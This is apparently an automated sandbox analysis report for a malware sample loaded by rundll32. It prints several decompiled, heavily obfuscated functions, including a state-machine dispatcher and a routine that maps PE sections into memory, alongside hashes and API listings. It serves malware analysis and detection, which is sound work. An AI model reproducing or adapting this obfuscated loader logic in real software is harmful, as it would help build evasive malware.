                                                                                                                      							__eflags = _t146 - 0x61;
                                                                                                                      							if(_t146 < 0x61) {
                                                                                                                      								L12:
                                                                                                                      								__eflags = _t146 - 0x41;
                                                                                                                      								if(_t146 < 0x41) {
                                                                                                                      									L14:
                                                                                                                      									 *_t156 = 0x58;
                                                                                                                      									goto L15;
                                                                                                                      								}
                                                                                                                      								__eflags = _t146 - 0x5a;
                                                                                                                      								if(_t146 <= 0x5a) {
                                                                                                                      									goto L15;
                                                                                                                      								}
                                                                                                                      								goto L14;
                                                                                                                      							}
                                                                                                                      							__eflags = _t146 - 0x7a;
                                                                                                                      							if(_t146 <= 0x7a) {
                                                                                                                      								goto L15;
                                                                                                                      							}
                                                                                                                      							goto L12;
                                                                                                                      						}
                                                                                                                      						__eflags = _t146 - 0x39;
                                                                                                                      						if(_t146 <= 0x39) {
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						goto L10;
                                                                                                                      						L15:
                                                                                                                      						_t156 = _t156 + 1;
                                                                                                                      						__eflags =  *_t156;
                                                                                                                      					} while ( *_t156 != 0);
                                                                                                                      					goto L16;
                                                                                                                      					L17:
                                                                                                                      					__eflags = _t155 - 0x55e4d43;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t146;
                                                                                                                      			}

































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *NXu$H"$kZ\$mv(
                                                                                                                      • API String ID: 0-3447753402
                                                                                                                      • Opcode ID: 8ffe67a786d0ce49982577d23fd060794f690740851f2a4821bc0c8eb4a7d2ca
                                                                                                                      • Instruction ID: add3fdfeb4411c26f72cd55ef9a1a54dfebb44f4a2fb4764d9ecff4f79f7b59e
                                                                                                                      • Opcode Fuzzy Hash: 8ffe67a786d0ce49982577d23fd060794f690740851f2a4821bc0c8eb4a7d2ca
                                                                                                                      • Instruction Fuzzy Hash: 567182714183819BC368DF24C88AA1FBBF2BBC5358F505A4DF48696260C3B5CA59CB83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E002BF58F(void* __ecx, char _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v560;
                                                                                                                      				char _v624;
                                                                                                                      				signed int _v628;
                                                                                                                      				signed int _v632;
                                                                                                                      				signed int _v636;
                                                                                                                      				signed int _v640;
                                                                                                                      				signed int _v644;
                                                                                                                      				signed int _v648;
                                                                                                                      				signed int _v652;
                                                                                                                      				signed int _v656;
                                                                                                                      				signed int _v660;
                                                                                                                      				signed int _v664;
                                                                                                                      				signed int _v668;
                                                                                                                      				signed int _v672;
                                                                                                                      				signed int _v676;
                                                                                                                      				signed int _v680;
                                                                                                                      				void* _t129;
                                                                                                                      				signed int _t143;
                                                                                                                      				signed int _t144;
                                                                                                                      				void* _t151;
                                                                                                                      				signed int _t155;
                                                                                                                      				char _t173;
                                                                                                                      				signed int _t174;
                                                                                                                      				signed int _t175;
                                                                                                                      				signed int _t176;
                                                                                                                      				signed int _t177;
                                                                                                                      				signed int* _t181;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t173 = _a4;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_t173);
                                                                                                                      				_push(E002D0CF5);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t129);
                                                                                                                      				_v660 = 0x8d8445;
                                                                                                                      				_t181 =  &(( &_v680)[5]);
                                                                                                                      				_t151 = 0x740f7fb;
                                                                                                                      				_t174 = 0x71;
                                                                                                                      				_v660 = _v660 / _t174;
                                                                                                                      				_v660 = _v660 ^ 0x128b90b3;
                                                                                                                      				_v660 = _v660 ^ 0x128ad02b;
                                                                                                                      				_v640 = 0x9067b5;
                                                                                                                      				_v640 = _v640 + 0x286c;
                                                                                                                      				_v640 = _v640 ^ 0x00975038;
                                                                                                                      				_v632 = 0x5011ea;
                                                                                                                      				_v632 = _v632 + 0xffff22a1;
                                                                                                                      				_v632 = _v632 ^ 0x00475e04;
                                                                                                                      				_v628 = 0xc0b5ed;
                                                                                                                      				_v628 = _v628 | 0x09c79ac0;
                                                                                                                      				_v628 = _v628 ^ 0x09cd8243;
                                                                                                                      				_v652 = 0x6be172;
                                                                                                                      				_v652 = _v652 << 0xe;
                                                                                                                      				_v652 = _v652 ^ 0xf9ae6093;
                                                                                                                      				_v652 = _v652 ^ 0x01f8093d;
                                                                                                                      				_v644 = 0xbd5efb;
                                                                                                                      				_v644 = _v644 << 3;
                                                                                                                      				_v644 = _v644 ^ 0x05e3f72f;
                                                                                                                      				_v656 = 0xc95ad0;
                                                                                                                      				_t175 = 0x15;
                                                                                                                      				_v656 = _v656 / _t175;
                                                                                                                      				_v656 = _v656 | 0xa2f71cc0;
                                                                                                                      				_v656 = _v656 ^ 0xa2f780bc;
                                                                                                                      				_v676 = 0xbb6512;
                                                                                                                      				_v676 = _v676 << 0x10;
                                                                                                                      				_v676 = _v676 ^ 0x67ff039f;
                                                                                                                      				_v676 = _v676 + 0xffff3430;
                                                                                                                      				_v676 = _v676 ^ 0x02e7c46b;
                                                                                                                      				_v636 = 0x771a54;
                                                                                                                      				_v636 = _v636 >> 0xf;
                                                                                                                      				_v636 = _v636 ^ 0x000f324c;
                                                                                                                      				_v680 = 0x44376b;
                                                                                                                      				_v680 = _v680 + 0xffff61f8;
                                                                                                                      				_v680 = _v680 + 0xffff924c;
                                                                                                                      				_v680 = _v680 << 0xc;
                                                                                                                      				_v680 = _v680 ^ 0x32b3ed2b;
                                                                                                                      				_v672 = 0x492cee;
                                                                                                                      				_v672 = _v672 | 0xff7fdef6;
                                                                                                                      				_v672 = _v672 ^ 0xff79836a;
                                                                                                                      				_v664 = 0x821e3f;
                                                                                                                      				_v664 = _v664 + 0xffff0102;
                                                                                                                      				_v664 = _v664 << 0xd;
                                                                                                                      				_v664 = _v664 ^ 0x23edf1fd;
                                                                                                                      				_v648 = 0xfa5772;
                                                                                                                      				_v648 = _v648 + 0x1fee;
                                                                                                                      				_v648 = _v648 ^ 0x00f8d439;
                                                                                                                      				_v668 = 0x765780;
                                                                                                                      				_t176 = 0x5a;
                                                                                                                      				_v668 = _v668 / _t176;
                                                                                                                      				_t177 = 0x7e;
                                                                                                                      				_t178 = _v648;
                                                                                                                      				_v668 = _v668 / _t177;
                                                                                                                      				_v668 = _v668 ^ 0x0009a212;
                                                                                                                      				L1:
                                                                                                                      				while(_t151 != 0x4c653bf) {
                                                                                                                      					if(_t151 == 0x50dca7b) {
                                                                                                                      						_v560 = 0x22c;
                                                                                                                      						_t144 = E002D0296( &_v560, _v644, _t178, _v656, _v676);
                                                                                                                      						_t181 =  &(_t181[3]);
                                                                                                                      						L10:
                                                                                                                      						asm("sbb ecx, ecx");
                                                                                                                      						_t155 =  ~_t144 & 0x074f90c1;
                                                                                                                      						L8:
                                                                                                                      						_t151 = _t155 + 0x59cade0;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t151 == 0x59cade0) {
                                                                                                                      						return E002C4DAD(_v672, _v664, _t178, _v648, _v668);
                                                                                                                      					}
                                                                                                                      					if(_t151 == 0x740f7fb) {
                                                                                                                      						_v624 = _t173;
                                                                                                                      						_t151 = 0x4c653bf;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t151 == 0xc1665e4) {
                                                                                                                      						_t144 = E002CE3F7(_v636, _t178,  &_v560, _v680);
                                                                                                                      						goto L10;
                                                                                                                      					}
                                                                                                                      					_t190 = _t151 - 0xcec3ea1;
                                                                                                                      					if(_t151 != 0xcec3ea1) {
                                                                                                                      						L16:
                                                                                                                      						__eflags = _t151 - 0x2876c78;
                                                                                                                      						if(__eflags != 0) {
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						return _t144;
                                                                                                                      					}
                                                                                                                      					_t144 = E002D0CF5(_t151, _t190,  &_v560,  &_v624);
                                                                                                                      					asm("sbb ecx, ecx");
                                                                                                                      					_t155 =  ~_t144 & 0x0679b804;
                                                                                                                      					goto L8;
                                                                                                                      				}
                                                                                                                      				_t143 = E002B3C3B(_t151, _v660);
                                                                                                                      				_t178 = _t143;
                                                                                                                      				_t181 = _t181 - 0xc + 0x10;
                                                                                                                      				__eflags = _t143 - 0xffffffff;
                                                                                                                      				if(__eflags == 0) {
                                                                                                                      					_t151 = 0x2876c78;
                                                                                                                      					goto L16;
                                                                                                                      				}
                                                                                                                      				_t151 = 0x50dca7b;
                                                                                                                      				goto L1;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: k7D$l($rk$,I
                                                                                                                      • API String ID: 0-1943337972
                                                                                                                      • Opcode ID: 5cd830d83508ed75ab2f871d234de20d52a494a5dd80b1a4b030c1ecf807255b
                                                                                                                      • Instruction ID: b448b6258f3e1ba366df72debed64fc0ae4c275e7123eaab77d5f4cb5f5b9945
                                                                                                                      • Opcode Fuzzy Hash: 5cd830d83508ed75ab2f871d234de20d52a494a5dd80b1a4b030c1ecf807255b
                                                                                                                      • Instruction Fuzzy Hash: FD71AC715193019BC7A4CF28C98989FBBF1FBC4758F504A6EF29696260D7B08919CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E002C8D71(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				void* _t119;
                                                                                                                      				void* _t128;
                                                                                                                      				void* _t138;
                                                                                                                      				void* _t140;
                                                                                                                      				signed int _t142;
                                                                                                                      				signed int _t143;
                                                                                                                      				void* _t158;
                                                                                                                      				void* _t163;
                                                                                                                      				signed int* _t167;
                                                                                                                      				signed int* _t168;
                                                                                                                      				signed int* _t169;
                                                                                                                      
                                                                                                                      				_t165 = _a12;
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t119);
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_v12 = 0xd63ca;
                                                                                                                      				_v8 = 0x2a80fb;
                                                                                                                      				_v32 = 0xd656a7;
                                                                                                                      				_t142 = 0x2a;
                                                                                                                      				_v32 = _v32 * 0x76;
                                                                                                                      				_v32 = _v32 ^ 0x62cbe0fa;
                                                                                                                      				_v60 = 0xd42ea;
                                                                                                                      				_v60 = _v60 | 0xae184de3;
                                                                                                                      				_v60 = _v60 * 0x64;
                                                                                                                      				_v60 = _v60 ^ 0xa1370c8b;
                                                                                                                      				_v60 = _v60 ^ 0xa2441b47;
                                                                                                                      				_v28 = 0x613a22;
                                                                                                                      				_v28 = _v28 + 0xe1cd;
                                                                                                                      				_v28 = _v28 ^ 0x00621baf;
                                                                                                                      				_v48 = 0x1555f7;
                                                                                                                      				_v48 = _v48 | 0xf97f7abf;
                                                                                                                      				_v48 = _v48 ^ 0xf978b226;
                                                                                                                      				_v36 = 0xa4495c;
                                                                                                                      				_v36 = _v36 << 0xc;
                                                                                                                      				_v36 = _v36 ^ 0x449a63ff;
                                                                                                                      				_v64 = 0xc77e0d;
                                                                                                                      				_v64 = _v64 * 0x7d;
                                                                                                                      				_v64 = _v64 << 3;
                                                                                                                      				_v64 = _v64 / _t142;
                                                                                                                      				_v64 = _v64 ^ 0x0042e8ad;
                                                                                                                      				_v24 = 0xcd3d37;
                                                                                                                      				_v24 = _v24 ^ 0xb946add1;
                                                                                                                      				_v24 = _v24 ^ 0xb982581d;
                                                                                                                      				_v40 = 0xe4266b;
                                                                                                                      				_v40 = _v40 << 9;
                                                                                                                      				_v40 = _v40 >> 5;
                                                                                                                      				_v40 = _v40 ^ 0x064c7215;
                                                                                                                      				_v44 = 0x9ee2d0;
                                                                                                                      				_v44 = _v44 + 0xdca1;
                                                                                                                      				_v44 = _v44 ^ 0x9755f080;
                                                                                                                      				_v44 = _v44 ^ 0x97c96657;
                                                                                                                      				_v20 = 0xa48706;
                                                                                                                      				_v20 = _v20 | 0xe10b6776;
                                                                                                                      				_v20 = _v20 ^ 0xe1a97c21;
                                                                                                                      				_v56 = 0x583a03;
                                                                                                                      				_v56 = _v56 * 0x56;
                                                                                                                      				_v56 = _v56 + 0x9dad;
                                                                                                                      				_v56 = _v56 * 0x55;
                                                                                                                      				_v56 = _v56 ^ 0xd77aa722;
                                                                                                                      				_v52 = 0xf9a5b4;
                                                                                                                      				_v52 = _v52 >> 6;
                                                                                                                      				_v52 = _v52 + 0xffff4c61;
                                                                                                                      				_v52 = _v52 << 8;
                                                                                                                      				_v52 = _v52 ^ 0x033f85cc;
                                                                                                                      				_v16 = 0x1cccaa;
                                                                                                                      				_v16 = _v16 + 0x745b;
                                                                                                                      				_v16 = _v16 ^ 0x0015a734;
                                                                                                                      				_t143 = _v48;
                                                                                                                      				_t128 = E002CBE0B(_t143, _v36, _v64, _a12);
                                                                                                                      				_t138 = _t128;
                                                                                                                      				_t167 =  &(( &_v64)[8]);
                                                                                                                      				if(_t138 != 0) {
                                                                                                                      					_push(_t143);
                                                                                                                      					_t158 = E002BB0DA(_v24, _v40,  *((intOrPtr*)(_t138 + 0x50)), _v28, _v44, _v60 | _v32);
                                                                                                                      					_t168 =  &(_t167[5]);
                                                                                                                      					if(_t158 == 0) {
                                                                                                                      						L6:
                                                                                                                      						return _t158;
                                                                                                                      					}
                                                                                                                      					E002CFD29( *_t165, _v20, _t158, _v56,  *((intOrPtr*)(_t138 + 0x54)));
                                                                                                                      					_t169 =  &(_t168[3]);
                                                                                                                      					_t163 = ( *(_t138 + 0x14) & 0x0000ffff) + 0x18 + _t138;
                                                                                                                      					_t140 = ( *(_t138 + 6) & 0x0000ffff) * 0x28 + _t163;
                                                                                                                      					while(_t163 < _t140) {
                                                                                                                      						_t136 =  <  ?  *((void*)(_t163 + 8)) :  *((intOrPtr*)(_t163 + 0x10));
                                                                                                                      						E002CFD29( *((intOrPtr*)(_t163 + 0x14)) +  *_t165, _v52,  *((intOrPtr*)(_t163 + 0xc)) + _t158, _v16,  <  ?  *((void*)(_t163 + 8)) :  *((intOrPtr*)(_t163 + 0x10)));
                                                                                                                      						_t169 =  &(_t169[3]);
                                                                                                                      						_t163 = _t163 + 0x28;
                                                                                                                      					}
                                                                                                                      					goto L6;
                                                                                                                      				}
                                                                                                                      				return _t128;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ":a$[t$k&$B
                                                                                                                      • API String ID: 0-806590991
                                                                                                                      • Opcode ID: 281fa8f6f751c76a05968668069489b05116c67e6a0c28320e401ee3824aa1ba
                                                                                                                      • Instruction ID: 4dd073c7582b030aec01353ac7febbd07e26739b0a73d90e4870fb29e0e885e9
                                                                                                                      • Opcode Fuzzy Hash: 281fa8f6f751c76a05968668069489b05116c67e6a0c28320e401ee3824aa1ba
                                                                                                                      • Instruction Fuzzy Hash: 035120B15183809FC354CF65C98691BFBF1BBC8748F409A1DF99A9A220D3B5DA48CF06
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetThreadLocale.KERNEL32 ref: 10043743
                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
                                                                                                                      • GetACP.KERNEL32 ref: 1004377E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Locale$InfoThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4232894706-0
                                                                                                                      • Opcode ID: b3bb746828bfca1d75c361473fc7d4eb73e80cfcdae290e0792f670d5ca24456
                                                                                                                      • Instruction ID: 7f1c2cc19d32dc966023cfaeb6742e61450fd940bcfd9952f16cd7e7d576cf6d
                                                                                                                      • Opcode Fuzzy Hash: b3bb746828bfca1d75c361473fc7d4eb73e80cfcdae290e0792f670d5ca24456
                                                                                                                      • Instruction Fuzzy Hash: 4AF0C871E04238ABE715DBA489556EFB7E4EB09A81B11416CD981E7251EE206D0487C9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                      • Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
                                                                                                                      • Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                      • Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E002C45CD(void* __edx, intOrPtr* _a4, intOrPtr* _a8) {
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				char _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				unsigned int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				void* __ecx;
                                                                                                                      				void* _t260;
                                                                                                                      				intOrPtr _t280;
                                                                                                                      				intOrPtr _t283;
                                                                                                                      				void* _t285;
                                                                                                                      				intOrPtr _t286;
                                                                                                                      				void* _t288;
                                                                                                                      				intOrPtr* _t291;
                                                                                                                      				void* _t293;
                                                                                                                      				intOrPtr _t310;
                                                                                                                      				signed int _t313;
                                                                                                                      				signed int _t314;
                                                                                                                      				signed int _t315;
                                                                                                                      				void* _t317;
                                                                                                                      				void* _t318;
                                                                                                                      
                                                                                                                      				_t291 = _a8;
                                                                                                                      				_t312 = _a4;
                                                                                                                      				_push(_t291);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E002BCF25(_t260);
                                                                                                                      				_v16 = 0xeda856;
                                                                                                                      				_t310 = 0;
                                                                                                                      				_v12 = 0;
                                                                                                                      				_t318 = _t317 + 0x10;
                                                                                                                      				_v8 = 0;
                                                                                                                      				_v108 = 0x9530b9;
                                                                                                                      				_t293 = 0x1386c75;
                                                                                                                      				_v108 = _v108 + 0xffff8498;
                                                                                                                      				_v108 = _v108 + 0xffff62a2;
                                                                                                                      				_v108 = _v108 ^ 0x009417f2;
                                                                                                                      				_v72 = 0x4d29da;
                                                                                                                      				_v72 = _v72 | 0x3a723bc7;
                                                                                                                      				_v72 = _v72 ^ 0x3a7f3bde;
                                                                                                                      				_v68 = 0xbb7b0e;
                                                                                                                      				_v68 = _v68 | 0x90968cd5;
                                                                                                                      				_v68 = _v68 ^ 0x90bfffdf;
                                                                                                                      				_v32 = 0x962435;
                                                                                                                      				_v32 = _v32 << 9;
                                                                                                                      				_v32 = _v32 ^ 0x2c486a00;
                                                                                                                      				_v124 = 0x38cf9b;
                                                                                                                      				_t313 = 0x3a;
                                                                                                                      				_v124 = _v124 * 0x5b;
                                                                                                                      				_v124 = _v124 / _t313;
                                                                                                                      				_v124 = _v124 << 3;
                                                                                                                      				_v124 = _v124 ^ 0x02c91350;
                                                                                                                      				_v104 = 0xa200dd;
                                                                                                                      				_v104 = _v104 ^ 0x0aab722c;
                                                                                                                      				_v104 = _v104 + 0xffff0d17;
                                                                                                                      				_v104 = _v104 ^ 0x0a088008;
                                                                                                                      				_v136 = 0xa03782;
                                                                                                                      				_v136 = _v136 >> 4;
                                                                                                                      				_v136 = _v136 >> 0xf;
                                                                                                                      				_v136 = _v136 + 0xffffdc54;
                                                                                                                      				_v136 = _v136 ^ 0xffffdc68;
                                                                                                                      				_v100 = 0xea2f66;
                                                                                                                      				_v100 = _v100 + 0xffffd1b3;
                                                                                                                      				_v100 = _v100 + 0xffff51f8;
                                                                                                                      				_v100 = _v100 ^ 0x00e840e3;
                                                                                                                      				_v132 = 0xadb516;
                                                                                                                      				_v132 = _v132 + 0xffff9028;
                                                                                                                      				_v132 = _v132 * 0x44;
                                                                                                                      				_v132 = _v132 + 0xffffe891;
                                                                                                                      				_v132 = _v132 ^ 0x2e08c107;
                                                                                                                      				_v140 = 0xeec816;
                                                                                                                      				_v140 = _v140 >> 7;
                                                                                                                      				_v140 = _v140 >> 0xf;
                                                                                                                      				_v140 = _v140 << 5;
                                                                                                                      				_v140 = _v140 ^ 0x000acf9f;
                                                                                                                      				_v116 = 0xb8b4c3;
                                                                                                                      				_v116 = _v116 + 0x5cf4;
                                                                                                                      				_v116 = _v116 + 0xffff9c7f;
                                                                                                                      				_v116 = _v116 ^ 0x00b90cd0;
                                                                                                                      				_v144 = 0x42ac99;
                                                                                                                      				_v144 = _v144 + 0xfffff6b6;
                                                                                                                      				_v144 = _v144 | 0xd26fea09;
                                                                                                                      				_v144 = _v144 + 0xcbeb;
                                                                                                                      				_v144 = _v144 ^ 0xd277b085;
                                                                                                                      				_v96 = 0x1bc5eb;
                                                                                                                      				_v96 = _v96 * 0x6c;
                                                                                                                      				_v96 = _v96 + 0x8f6c;
                                                                                                                      				_v96 = _v96 ^ 0x0bb05dde;
                                                                                                                      				_v48 = 0x1a2576;
                                                                                                                      				_v48 = _v48 * 0x64;
                                                                                                                      				_v48 = _v48 ^ 0x0a36ba39;
                                                                                                                      				_v88 = 0xc7f5d;
                                                                                                                      				_v88 = _v88 >> 4;
                                                                                                                      				_v88 = _v88 >> 0xf;
                                                                                                                      				_v88 = _v88 ^ 0x00037446;
                                                                                                                      				_v84 = 0x3f34b5;
                                                                                                                      				_t314 = 0x5e;
                                                                                                                      				_v84 = _v84 * 0x31;
                                                                                                                      				_v84 = _v84 >> 0xe;
                                                                                                                      				_v84 = _v84 ^ 0x000d159a;
                                                                                                                      				_v120 = 0x5d4df8;
                                                                                                                      				_v120 = _v120 + 0xffffa239;
                                                                                                                      				_v120 = _v120 << 4;
                                                                                                                      				_v120 = _v120 ^ 0x05c58312;
                                                                                                                      				_v60 = 0x26932d;
                                                                                                                      				_v60 = _v60 / _t314;
                                                                                                                      				_v60 = _v60 ^ 0x000131ea;
                                                                                                                      				_v28 = 0x785747;
                                                                                                                      				_v28 = _v28 ^ 0x77c5d7dc;
                                                                                                                      				_v28 = _v28 ^ 0x77b818bc;
                                                                                                                      				_v56 = 0xd134ba;
                                                                                                                      				_t315 = 0x67;
                                                                                                                      				_v56 = _v56 * 7;
                                                                                                                      				_v56 = _v56 ^ 0x05bb4239;
                                                                                                                      				_v40 = 0xd9afd1;
                                                                                                                      				_v40 = _v40 * 0x25;
                                                                                                                      				_v40 = _v40 ^ 0x1f79b6d7;
                                                                                                                      				_v128 = 0x3f4f78;
                                                                                                                      				_v128 = _v128 / _t315;
                                                                                                                      				_v128 = _v128 | 0x7b2b5a07;
                                                                                                                      				_v128 = _v128 + 0xfffffa98;
                                                                                                                      				_v128 = _v128 ^ 0x7b2edba2;
                                                                                                                      				_v80 = 0xe956c4;
                                                                                                                      				_v80 = _v80 << 5;
                                                                                                                      				_v80 = _v80 ^ 0x1d2c49e8;
                                                                                                                      				_v64 = 0x3f3e0b;
                                                                                                                      				_v64 = _v64 * 5;
                                                                                                                      				_v64 = _v64 ^ 0x01394f8d;
                                                                                                                      				_v112 = 0xfc7f0a;
                                                                                                                      				_v112 = _v112 + 0xffff18e0;
                                                                                                                      				_v112 = _v112 + 0xffffa855;
                                                                                                                      				_v112 = _v112 ^ 0x00f14c19;
                                                                                                                      				_v92 = 0x78d624;
                                                                                                                      				_v92 = _v92 << 6;
                                                                                                                      				_v92 = _v92 + 0xffffec5c;
                                                                                                                      				_v92 = _v92 ^ 0x1e335a68;
                                                                                                                      				_v36 = 0xd9641a;
                                                                                                                      				_v36 = _v36 + 0xffff84de;
                                                                                                                      				_v36 = _v36 ^ 0x00d9de20;
                                                                                                                      				_v44 = 0x6f829b;
                                                                                                                      				_v44 = _v44 ^ 0xdbcb61d0;
                                                                                                                      				_v44 = _v44 ^ 0xdba9195b;
                                                                                                                      				_v52 = 0xea26f7;
                                                                                                                      				_v52 = _v52 + 0xffff0808;
                                                                                                                      				_v52 = _v52 ^ 0x00eef997;
                                                                                                                      				_v76 = 0xef1604;
                                                                                                                      				_v76 = _v76 + 0xfcdc;
                                                                                                                      				_v76 = _v76 + 0xffff9946;
                                                                                                                      				_v76 = _v76 ^ 0x00e2e7da;
                                                                                                                      				while(_t293 != 0x1386c75) {
                                                                                                                      					if(_t293 == 0x185c552) {
                                                                                                                      						_push(_t293);
                                                                                                                      						_push(_t293);
                                                                                                                      						_t280 = E002C3512(_v20);
